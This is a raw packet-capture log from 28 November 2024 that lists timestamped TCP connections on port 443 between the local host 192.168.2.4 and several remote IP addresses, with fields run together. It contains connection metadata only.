                                                                                                                                          Nov 28, 2024 11:33:00.302095890 CET49821443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.302140951 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.302447081 CET49821443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.302459002 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.302701950 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.302989960 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.303024054 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.303385019 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.303391933 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.335164070 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.335268021 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.351157904 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.351238012 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.365608931 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.365731001 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.381517887 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.381649017 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.393855095 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.393882990 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.393986940 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.394000053 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.449441910 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.451232910 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.451317072 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.462414026 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.462481976 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.472925901 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.472997904 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.473035097 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.473050117 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.473165035 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.484608889 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.484679937 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.497498989 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.497591972 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.503933907 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.504014969 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.550909042 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.550972939 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.557566881 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.557627916 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.563802004 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.563869953 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.571825981 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.571887970 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.575691938 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.575705051 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.575767040 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.578115940 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.578176022 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.580193043 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.580250025 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.580259085 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.580275059 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.580332041 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.581743956 CET49817443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.581758976 CET443498175.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.601007938 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.601025105 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.601094961 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.608462095 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.615237951 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:00.615253925 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.616174936 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.616233110 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:00.617259026 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.617284060 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.617343903 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.617391109 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.617872000 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.617923021 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.618448019 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:00.618508101 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.618932962 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:00.618942022 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.620174885 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.620198965 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.620248079 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.620263100 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.620342016 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.623347998 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.623389006 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.623415947 CET49823443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.623434067 CET4434982313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.625370979 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.625379086 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.625473022 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.625550985 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.625586987 CET4434982213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.625638008 CET49822443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.626836061 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.626904964 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.631176949 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.631215096 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.631264925 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.631664038 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.631675959 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.633457899 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.633485079 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.633529902 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.633886099 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.633900881 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.665230989 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.665316105 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.668854952 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:00.694500923 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.694607019 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.757847071 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.757921934 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.758017063 CET49824443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.760185003 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.760246992 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.760297060 CET49821443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.765691042 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.765718937 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.765789986 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.765806913 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.765841961 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.765850067 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.765909910 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.771857023 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.771917105 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.771989107 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.781742096 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.781876087 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.801599026 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.801691055 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.815855980 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.816049099 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.829519033 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.829763889 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.842971087 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.843086958 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.879308939 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.879422903 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.893151999 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.893346071 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.953905106 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.953975916 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.962713957 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.962786913 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.966715097 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.971234083 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.971303940 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.974513054 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.974520922 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.975037098 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.975383043 CET49824443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.975395918 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.975405931 CET49824443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.975410938 CET4434982413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.976692915 CET49821443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.976692915 CET49821443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.976762056 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.976790905 CET4434982113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.978938103 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.978938103 CET49820443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:00.978967905 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.978979111 CET4434982013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.981251001 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.981314898 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.989067078 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.989128113 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.993282080 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:00.993338108 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.996872902 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:00.996944904 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.006207943 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.006288052 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.007611990 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.011894941 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.011954069 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.017611980 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.017621994 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.017688036 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.024187088 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.024267912 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.028570890 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.028604031 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.028659105 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.030355930 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.030421019 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.033557892 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.033588886 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.033657074 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.034595013 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.034611940 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.035021067 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.035286903 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.035553932 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.035567999 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.035809994 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.035953999 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.035967112 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.036102057 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.036694050 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.037621975 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.037635088 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.037703991 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.037949085 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:01.037959099 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.051023006 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.051107883 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.051331043 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.056766987 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.056828976 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.057441950 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.057661057 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.057677031 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.058080912 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.058789015 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.058857918 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.059302092 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.062386990 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.062452078 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.090137005 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.099344015 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.100341082 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.100548983 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.100558043 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.100883007 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.101197958 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.101248026 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.101311922 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.141858101 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.141942024 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.143330097 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.145169973 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.145245075 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.150393009 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.150486946 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.154330015 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.154388905 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.158324957 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.158392906 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.162102938 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.162177086 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.167403936 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.167468071 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.170842886 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.170908928 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.174710989 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.174776077 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.179574966 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.179641008 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.182831049 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.182898998 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.187767029 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.187834024 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.191519022 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.191591024 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.255304098 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.255367994 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.259048939 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.259113073 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.263864040 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.263926029 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.267644882 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.267728090 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.335694075 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.335763931 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.338690996 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.338753939 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.342751026 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.342811108 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.346091986 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.346157074 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.349080086 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.349142075 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.352802992 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.352868080 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.356925011 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.356987953 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.359848022 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.359910011 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.363114119 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.363182068 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.366909981 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.366978884 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.370003939 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.370078087 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.374247074 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.374314070 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.445581913 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.445655107 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.448030949 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.448101997 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.451206923 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.451266050 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.453784943 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.453849077 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.526809931 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.526882887 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.530025959 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.530090094 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.530926943 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.530991077 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531002045 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531016111 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531075001 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531455994 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531476974 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531491041 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531491995 CET443498195.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531527042 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531529903 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531537056 CET49819443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531563044 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.531570911 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.531593084 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.535464048 CET49836443192.168.2.45.57.41.119
